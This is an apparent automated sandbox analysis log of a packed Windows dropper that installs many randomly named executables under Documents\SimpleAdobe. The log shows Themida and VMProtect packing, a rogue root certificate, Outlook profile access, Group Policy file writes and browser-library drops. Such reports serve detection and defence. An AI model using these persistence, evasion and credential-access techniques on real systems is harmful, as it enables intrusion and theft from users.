                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: mozglue.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: vcruntime140.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: msvcp140.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: vcruntime140.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: linkinfo.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeSection loaded: acgenral.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeSection loaded: winmm.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeSection loaded: samcli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeSection loaded: msacm32.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeSection loaded: version.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EA502722-A23D-11D1-A7D3-0000F87571E3}\InProcServer32Jump to behavior
                      Source: Google Chrome.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                      Source: Google Chrome.lnk0.8.drLNK file: ..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                      Source: Google Chrome.lnk1.8.drLNK file: ..\..\..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                      Source: Microsoft Edge.lnk.8.drLNK file: ..\..\..\..\..\..\..\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Source: Microsoft Edge.lnk0.8.drLNK file: ..\..\..\..\..\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpWindow found: window name: TMainForm
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeDirectory created: C:\Program Files\Windows Media Player\background.jpg
                      Source: CHA0VZiz8y.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: CHA0VZiz8y.exeStatic file information: File size 6923264 > 1048576
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: CHA0VZiz8y.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x265400
                      Source: CHA0VZiz8y.exeStatic PE information: Raw size of .themida is bigger than: 0x100000 < 0x41a000
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: CHA0VZiz8y.exe, CHA0VZiz8y.exe, 00000000.00000003.2167855802.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2166974525.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2170119555.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2168305429.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2171871985.0000000005458000.00000004.00000020.00020000.00000000.sdmp, MYZqYdU5cUVwEz2j0JYbnTar.exe, 00000011.00000000.2266973416.00000000002CC000.00000002.00000001.01000000.00000010.sdmp, MYZqYdU5cUVwEz2j0JYbnTar.exe, 00000011.00000002.2592127849.00000000002CC000.00000002.00000001.01000000.00000010.sdmp
                      Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 7U1bGcxK3Lqi_XMHDNEdJrhB.exe, 7U1bGcxK3Lqi_XMHDNEdJrhB.exe, 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: CHA0VZiz8y.exe, 00000000.00000000.2042780936.00000001409DF000.00000080.00000001.01000000.00000003.sdmp
                      Source: Binary string: MsMpEng.pdbH source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2329349408.000001F25CE30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: xS7PhKcNZTx4FuBAD1RB9kbJ.exe, 00000008.00000000.2265131582.000002967CCE2000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: K:\2024-5-11\createProcessWithAdmin error\x64\Release\ConsoleApplication1.pdb source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2344382832.000001F25AEA4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: K:\2024-5-11\ZQDS\x64\Release\ZQDS.pdb source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2329349408.000001F25CE30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmp, A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2606812448.000000000420F000.00000004.00000800.00020000.00000000.sdmp, A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2606812448.0000000003BD3000.00000004.00000800.00020000.00000000.sdmp, A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2650479083.0000000005600000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdb source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000000.2269042041.00000000006CC000.00000080.00000001.01000000.00000013.sdmp
                      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: CHA0VZiz8y.exe, 00000000.00000000.2042780936.0000000140BB1000.00000080.00000001.01000000.00000003.sdmp
                      Source: Binary string: $K:\2024-5-11\ZQDS\x64\Release\ZQDS.pdb source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2329349408.000001F25CE30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: MsMpEng.pdb source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2329349408.000001F25CE30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: CHA0VZiz8y.exe, 00000000.00000000.2042780936.0000000140BB1000.00000080.00000001.01000000.00000003.sdmp
                      Source: Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdbhhh source: CHA0VZiz8y.exe, 00000000.00000003.2138600045.000000000441E000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2139765657.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138058247.0000000004B51000.00000004.00000020.00020000.00000000.sdmp, FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000000.2266954848.00007FF762EB9000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 7U1bGcxK3Lqi_XMHDNEdJrhB.exe, 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdbfffGCTL source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdb source: CHA0VZiz8y.exe, 00000000.00000003.2138600045.000000000441E000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2139765657.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138058247.0000000004B51000.00000004.00000020.00020000.00000000.sdmp, FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000000.2266954848.00007FF762EB9000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2606812448.0000000004141000.00000004.00000800.00020000.00000000.sdmp, A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2606812448.00000000042CC000.00000004.00000800.00020000.00000000.sdmp, A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000002.2650479083.00000000056BA000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeUnpacked PE file: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exeUnpacked PE file: 29.2.turquoisecdplayer.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_set_1:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeUnpacked PE file: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exeUnpacked PE file: 29.2.turquoisecdplayer.exe.400000.0.unpack
                      Source: xS7PhKcNZTx4FuBAD1RB9kbJ.exe.0.drStatic PE information: 0xA1298F1A [Mon Sep 6 14:56:26 2055 UTC]
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6895B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,14_2_6895B6C0
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .themida
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_4854203
                      Source: MYZqYdU5cUVwEz2j0JYbnTar.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2ae5ee
                      Source: setup294[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2ae5ee
                      Source: setup[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x748759
                      Source: _rSi8sV87ppx0bgkbETdFbEZ.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x585c09
                      Source: J9jGBSSbDD3yrTx79DzmOLls.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x74f42
                      Source: oiii[1].exe.0.drStatic PE information: real checksum: 0x43729 should be: 0x44c3b
                      Source: xS7PhKcNZTx4FuBAD1RB9kbJ.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x14a7b
                      Source: niko[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x300943
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x300943
                      Source: o2i3jroi23joj23ikrjokij3oroi[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x209473
                      Source: crt[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x585c09
                      Source: zfQlIB6J8n2u_zLV5LHnA1xW.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x209473
                      Source: g_XGqx6vQcj4WvdQ2CmFiUpM.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x748759
                      Source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe.0.drStatic PE information: real checksum: 0x43729 should be: 0x44c3b
                      Source: ogoGQsWFwF_EcodN5qF7hiVC.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x622de
                      Source: kat806.tmp.12.drStatic PE information: real checksum: 0x0 should be: 0xdfa9e
                      Source: CHA0VZiz8y.exeStatic PE information: section name:
                      Source: CHA0VZiz8y.exeStatic PE information: section name:
                      Source: CHA0VZiz8y.exeStatic PE information: section name: .themida
                      Source: Default15_s[1].exe.0.drStatic PE information: section name: .vmp
                      Source: Default15_s[1].exe.0.drStatic PE information: section name: .vmp
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: default_s[1].exe.0.drStatic PE information: section name: .vmp
                      Source: default_s[1].exe.0.drStatic PE information: section name: .vmp
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe.0.drStatic PE information: section name: .vmp
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe.0.drStatic PE information: section name: .vmp
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: ZMyjNtrJZsXoQ4xLeKYzrWJD.exe.0.drStatic PE information: section name: .vmp
                      Source: ZMyjNtrJZsXoQ4xLeKYzrWJD.exe.0.drStatic PE information: section name: .vmp
                      Source: setup294[1].exe.0.drStatic PE information: section name: .didat
                      Source: MYZqYdU5cUVwEz2j0JYbnTar.exe.0.drStatic PE information: section name: .didat
                      Source: Retailer_prog[1].exe.0.drStatic PE information: section name: .vmp
                      Source: Retailer_prog[1].exe.0.drStatic PE information: section name: .vmp
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe.0.drStatic PE information: section name: .vmp
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe.0.drStatic PE information: section name: .vmp
                      Source: setup[1].exe.0.drStatic PE information: section name: .sxdata
                      Source: g_XGqx6vQcj4WvdQ2CmFiUpM.exe.0.drStatic PE information: section name: .sxdata
                      Source: 123p[1].exe.0.drStatic PE information: section name: .00cfg
                      Source: 123p[1].exe.0.drStatic PE information: section name: .text0
                      Source: 123p[1].exe.0.drStatic PE information: section name: .text1
                      Source: 123p[1].exe.0.drStatic PE information: section name: .text2
                      Source: RPA18tS89oJgBrOTDKzODMll.exe.0.drStatic PE information: section name: .00cfg
                      Source: RPA18tS89oJgBrOTDKzODMll.exe.0.drStatic PE information: section name: .text0
                      Source: RPA18tS89oJgBrOTDKzODMll.exe.0.drStatic PE information: section name: .text1
                      Source: RPA18tS89oJgBrOTDKzODMll.exe.0.drStatic PE information: section name: .text2
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: section name:
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: section name:
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: section name:
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: section name:
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: section name: .themida
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_00411ABC push eax; ret 7_2_00411ADA
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_00404F15 push ecx; ret 7_2_00404F28
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_021730AF push ecx; retf 7_2_021730B2
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02238F05 push ecx; ret 7_2_02238F18
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: 9_2_00454A56 push ecx; ret 9_2_00454A69
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: 11_2_00AA4A56 push ecx; ret 11_2_00AA4A69
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeCode function: 12_2_0431B010 push edx; ret 12_2_0431B21F
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeCode function: 12_2_0431A910 push edx; ret 12_2_0431A91B
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689ACC2B push ecx; ret 14_2_689ACC3E
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689AD565 push ecx; ret 14_2_689AD578
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689C369E push 689C8A44h; ret 14_2_689C36A6
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689C3693 push 689C8A44h; ret 14_2_689C369B
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689C3688 push 689C8A44h; ret 14_2_689C3690
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_02A2AD18 push eax; mov dword ptr [esp], ecx14_2_02A2AD19
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_0526890F push dword ptr [esp+ecx*2-75h]; ret 14_2_05268913
                      Source: CHA0VZiz8y.exeStatic PE information: section name: entropy: 7.284719044401107
                      Source: niko[1].exe.0.drStatic PE information: section name: entropy: 7.999545205723714
                      Source: niko[1].exe.0.drStatic PE information: section name: entropy: 7.996427300575862
                      Source: niko[1].exe.0.drStatic PE information: section name: entropy: 7.810128477231601
                      Source: niko[1].exe.0.drStatic PE information: section name: entropy: 7.968945161428635
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name: entropy: 7.999545205723714
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name: entropy: 7.996427300575862
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name: entropy: 7.810128477231601
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name: entropy: 7.968945161428635

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-E4QTE.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\123p[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\libcurl.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\msvcr120.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\QtAVWidgets1.dll (copy)Jump to dropped file
